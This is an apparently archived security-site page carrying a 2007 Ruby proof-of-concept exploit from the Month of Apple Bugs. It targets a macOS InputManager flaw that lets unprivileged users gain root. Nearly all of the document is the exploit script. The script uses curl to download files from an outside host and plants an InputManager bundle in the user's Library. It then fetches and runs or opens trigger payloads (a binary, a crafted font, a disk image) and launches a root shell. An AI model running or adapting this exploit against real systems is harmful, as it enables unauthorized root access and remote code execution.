Month of Apple Bugs - InputManager provided by the user. Code within the input manager will run under wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges. This is the proof of concept exploit that demonstrates this vulnerability.
649846dcedfd17c9b293d5b586249ab6641f7f2f4b7077ce8728d64523c3794e#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#
require 'fileutils'
bugselected = (ARGV[0] || 0).to_i
INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"
case bugselected
when 0
target_url = "http://projects.info-pull.com/moab/bug-files/notification"
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
when 1
target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
when 2
target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end
CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
def escalate()
puts "++ Welcome to Pwndertino..."
system CMD_LINE
sleep 5
system "/Users/Shared/shX"
end
escalate()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed